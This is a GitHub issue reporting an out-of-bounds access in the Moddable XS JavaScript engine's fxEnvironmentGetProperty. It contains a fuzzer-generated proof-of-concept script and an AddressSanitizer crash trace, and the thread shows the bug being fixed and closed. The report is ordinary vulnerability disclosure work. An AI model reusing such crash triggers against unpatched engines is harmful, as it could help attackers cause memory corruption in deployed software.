over access(fxEnvironmentGetProperty) #585

Closed
bird8693 opened this issue Feb 26, 2021 · 0 comments
Labels: fixed - please verify (Issue has been fixed. Please verify and close.)


Environment

operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc

poc:

function getHiddenValue() {
    var obj = {};
    var nEmw = new RegExp(null);
    var oob = 'value';
    var fun = eval(str);
    nEmw = new Object();
    oob = Object.assign('0', Object(521));
    var str = 'new String(\'\')';
    var fun = eval(str);
    let protoWithIndexedAccessors = {};
    var j = [];
    Object.assign(obj, fun);
    var fun = eval(str);
    return obj;
}
function makeOobString() {
    var hiddenValue = getHiddenValue();
    var str = 'constructor';
    var extern_arr_vars = [];
    let i = 0;
    var ijjkkk = 0;
    str = ijjkkk < 100000;
    function helper(i) {
        let a = new Array();
        var extern_arr_vars = [];
        if (ijjkkk < 100000) {
            makeOobString(a, protoWithIndexedAccessors);
        }
        return a;
        var oobString = makeOobString();
    }
    var j = [];
    var fun = eval(str);
    Object(fun, hiddenValue);
    var oobString = helper();
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        fun = makeOobString();
    }
    return oobString;
}
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};

description

ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
    #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
    #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
    #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
    #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
    #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING


mkellner pushed a commit that referenced this issue Mar 15, 2021
phoddie added the "fixed - please verify" label Mar 15, 2021
phoddie closed this as completed Mar 23, 2021